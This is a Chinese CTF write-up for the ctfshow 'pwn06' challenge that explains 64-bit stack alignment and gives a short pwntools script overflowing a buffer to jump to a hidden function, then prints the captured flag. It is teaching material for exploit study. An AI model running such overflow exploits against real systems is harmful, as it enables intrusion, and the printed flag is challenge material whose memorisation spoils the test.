pwn06(关于64位程序堆栈平衡的处理)

简介: pwn06(关于64位程序堆栈平衡的处理)

堆栈平衡:

当我们在堆栈中进行堆栈的操作的时候,一定要保证在RET这条指令之前,ESP指向的是我们压入栈中的地址,函数执行到ret执行之前,堆栈栈顶的地址 一定要是call指令的下一个地址。

简单检查一下,发现是64位程序

同样放进IDA反编译main函数,得到伪代码

只有一个welcome函数,双击跟进

存在栈溢出

我们开始找需要利用的函数的地址(函数开始的地址)

400577

对于32位程序我们只需要这个地址;

但是对于64位程序,我们还需要找 lev 的地址或者该函数结束即 retn 的地址

40057B 或者 40058E 都可以,构造payload时将该地址放在函数开始地址之前

我们再找距离 (造成栈溢出的函数到栈底的距离)

32位里我们找的ebp,64位里叫rbp

这里是C,十六进制的C也就是12

我们前面说过,距离还需要再加上栈底的字节大小,32位是加4,64位是加8

同样这里主函数没有输出东西,因此不需要调用接收函数

编写exp脚本:

from pwn import *
p =remote("pwn.challenge.ctf.show",28138)
payload = b"a" * (0xC+8)+ p64(0x40058E) + p64(0x400577) 
p.send(payload)
p.interactive()

#使用40057B也是可以的,前面也可以将结果加出来,C就是12,12+8=20,换成16进制就是0x14

使用python运行脚本

执行命令拿到flag

ctfshow{91ec74ab-3b94-4848-8495-2889971c5a1b}

目录
相关文章
|
7月前
|
存储 程序员 编译器
C/C++堆栈详细分析,新老程序员必会
C/C++堆栈详细分析,新老程序员必会
227 1
|
8月前
|
存储 缓存 监控
探秘Linux系统内存问题:主体 进程RSS均正常但系统内存下降的调查方法
探秘Linux系统内存问题:主体 进程RSS均正常但系统内存下降的调查方法
176 0
|
NoSQL Shell Python
pwn05(应对简单栈溢出的常规套路)
pwn05(应对简单栈溢出的常规套路)
87 1
|
存储
计算机系统(1)实验二 LC-3机器码编程试验
计算机系统(1)实验二 LC-3机器码编程试验
491 0
计算机系统(1)实验二 LC-3机器码编程试验
|
开发框架 .NET API
绝顶技术:断点+内存映射组合的 CLR 超强 BUG?
你见过【断点+内存映射】制造了一个另类隐藏极深,强悍的 BUG 吗?这是一个虚拟机 CLR 的 BUG。不同于之前所遇见的 BUG 这次费时最多,但是问题已然清晰。
238 0
|
开发框架 .NET Linux
拨开乌云见月明:断点+内存映射终章(CLR 问题)
【内存映射+断点】,从今年一月份开始遇到这个问题,当时并没有重视。实际上的问题并没有解决,而是掩盖了这个问题。1月份的原文:《Net7的默认构造函数.Ctor下断点出错续》。前几天又遇到了,这种一而再的问题,于是乎必须要解决了。到今天为止,似乎问题的主旨已然清晰。本篇除了阐述问题的来龙去脉,还要更正前两篇的一些错误观点。
118 0
理论:第十三章:堆溢出,栈溢出的出现场景以及解决方案
理论:第十三章:堆溢出,栈溢出的出现场景以及解决方案
201 0
理论:第十三章:堆溢出,栈溢出的出现场景以及解决方案
计算机系统(1)实验一 LC-3机器码编程试验
计算机系统(1)实验一 LC-3机器码编程试验
328 0
计算机系统(1)实验一 LC-3机器码编程试验
|
Oracle 算法 Java
刨根问底---一次OOM试验造成的电脑雪崩引发的思考
刨根问底---一次OOM试验造成的电脑雪崩引发的思考